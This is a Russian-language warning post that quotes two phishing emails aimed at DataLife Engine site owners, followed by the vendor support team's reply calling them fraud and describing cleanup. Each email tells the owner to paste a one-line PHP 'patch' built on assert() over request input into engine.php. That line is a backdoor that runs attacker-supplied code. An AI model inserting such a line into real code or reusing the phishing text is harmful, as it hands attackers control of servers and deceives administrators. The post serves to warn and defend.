1 Вариант
Уважаемые владельцы сайта!
Поздравляем Вас с удачным выбором системы управления сайтом «DataLife Engine».
Вы получили это письмо, так как нами была обнаружена потенциальная уязвимость позволяющая злоумышленникам, при определенных настройках серверного ПО, беспрепятственно получить доступ к панели управления уязвимого сайта.
Уязвимость является критической, и по нашим данным около 92% всех сайтов, использующих систему управления сайтом «DataLife Engine» уязвимы и подвержены взлому.
К сожалению, Ваш сайт входит в число уязвимых сайтов. Просим Вас отнестись к этому серьёзно и в кратчайшие сроки исправить данную ошибку.
Для исправления, в файле вашего сайта: /engine/engine.php в самое начало после строки: <?php добавьте: assert($_REQUEST['DATALIFEENGINE']);
С уважением,
ООО «Софтньюс Медиа Групп»
IP адрес отправителя: 162.244.33.213
2 Вариант
Данное письмо вам отправил support@dle-news.ru с сайта http://_______.ru/
------------------------------------------------
Текст сообщения
------------------------------------------------
Здравствуйте, уважаемый клиент!
Благодарим Вас за использование на Вашем сайте имя-сайта.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».
Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.
По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.
Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: имя-сайта.ru/engine/engine.php и в самое начало файла после строчки:
<?php
добавьте:
assert($_GET[REQUEST]);
С уважением,
Служба поддержки «DataLife Engine»
IP адрес отправителя: 46.38.63.68
А вот, что ответила служба поддержки «DataLife Engine»:
Это письмо от мошенников. Это письмо пришло не от нас и не от нашего
домена. А просто было отправлено вам с вашего же сайта через обратную связь.
Все патчи публикуются только на странице http://dle-news.ru/bags/ и ставить
нужно патчи только с официального сайта. А это распространение вируса.
Если вы выполните инструкцию из письма на ваш сайт будет установлен шелл.
Если вы всетаки выполнили инструкцию, то для решения проблемы нужно делать следующее:
Наиболее идеальный вариант это полное удаление всего с сайта без исключения
и восстановление данных из бекапов хостинга на состояние которое было до
внедрения вами этого кода.
Обьясню почему этим кодом вы передали полное управление сервером
злоумышленникам. Они могли сделать все что угодно распространить дальше
бекдор куда угодно и искать его может быть в некоторых случаях бессмысленно.
Если первый вариант нельзя выполнить по каким либо причинам. Перезаливайте
все файлы скрипта на сервере повторно, заменив их на оригинальные из архива
дистрибутива. При использовании старых версий скрипта, не забудьте установить
патчи безопасности опубликованные на странице http://dle-news.ru/bags/
Далее заходите в админпанель запускайте антивирус и удаляйте все на что он
укажет. Далее вручную проверяйте все файлы в папке engine/data/ на наличие
посторонних и подозрительных кодов. Но этот вариант не дает 100% гарантий
устранения проблемы.
С уважением,
Служба поддержки DataLife Engine
